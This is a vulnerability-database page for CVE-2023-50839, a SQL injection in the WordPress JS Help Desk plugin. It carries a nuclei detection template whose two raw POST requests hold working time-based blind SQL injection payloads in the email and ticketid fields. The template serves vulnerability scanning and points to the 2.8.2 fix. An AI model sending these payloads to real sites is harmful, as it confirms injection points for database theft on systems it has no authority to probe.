Lucene search
K

JS Help Desk <= 2.8.1 - SQL Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

SQL injection in JS Help Desk up to 2.8.1 via email and trackingid allows unauthenticated access; fixed in 2.8.2.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-7337
4 Mar 202609:24
attackerkb
Circl
CVE-2023-50839
20 Jan 202415:17
circl
CNNVD
WordPress Plugin JS Help Desk SQL Injection Vulnerability
28 Dec 202300:00
cnnvd
CVE
CVE-2023-50839
28 Dec 202320:02
cve
Cvelist
CVE-2023-50839 WordPress JS Help Desk – Best Help Desk & Support Plugin <= 2.8.1 is vulnerable to SQL Injection
28 Dec 202320:02
cvelist
EUVD
EUVD-2023-55572
3 Oct 202520:07
euvd
EUVD
EUVD-2023-60537
4 Mar 202612:30
euvd
NVD
CVE-2023-50839
28 Dec 202320:16
nvd
OSV
CVE-2023-50839
28 Dec 202320:16
osv
Patchstack
WordPress JS Help Desk – Best Help Desk & Support Plugin Plugin <= 2.8.1 is vulnerable to SQL Injection
21 Dec 202300:00
patchstack
Rows per page
id: CVE-2023-50839

info:
  name: JS Help Desk <= 2.8.1 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The JS Help Desk – Best Help Desk & Support Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘email' and 'trackingid' parameters in all versions up to 2.8.2 (exclusive) due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or database compromise.
  remediation: |
    Update to the latest version of JS Help Desk, version 2.8.2 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50839
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/js-support-ticket/js-help-desk-281-unauthenticated-sql-injection-via-email-and-trackingid
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-50839
    epss-score: 0.02041
    epss-percentile: 0.78804
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,js-support-ticket,unauth

flow: http(1) || http(2)

http:
  - raw:
      - |
        @timeout: 20s
        POST /js-support-ticket-controlpanel/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        form_request=jssupportticket&jstmod=ticket&task=showticketstatus&[email protected]' AND SLEEP(8)-- -&ticketid=test123

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 302'
          - 'len(body) == 0'
          - 'contains(content_type, "text/html")'
        condition: and

  - raw:
      - |
        @timeout: 20s
        POST /js-support-ticket-controlpanel/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        form_request=jssupportticket&jstmod=ticket&task=showticketstatus&[email protected]&ticketid=1'+AND+(SELECT+1+FROM+(SELECT+SLEEP(8))x)--+-

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 302'
          - 'len(body) == 0'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a00473045022100cb9dd73cc5a993d03923faea22eb4633649075a13e462fb0b952ebedba1bf8cb022015929a7d9ba6a37234408802a41ab44f015291513e62dcea9e9fe3937bf356b3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Feb 2026 11:58Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.3 - 9.8
EPSS0.02041
SSVC
13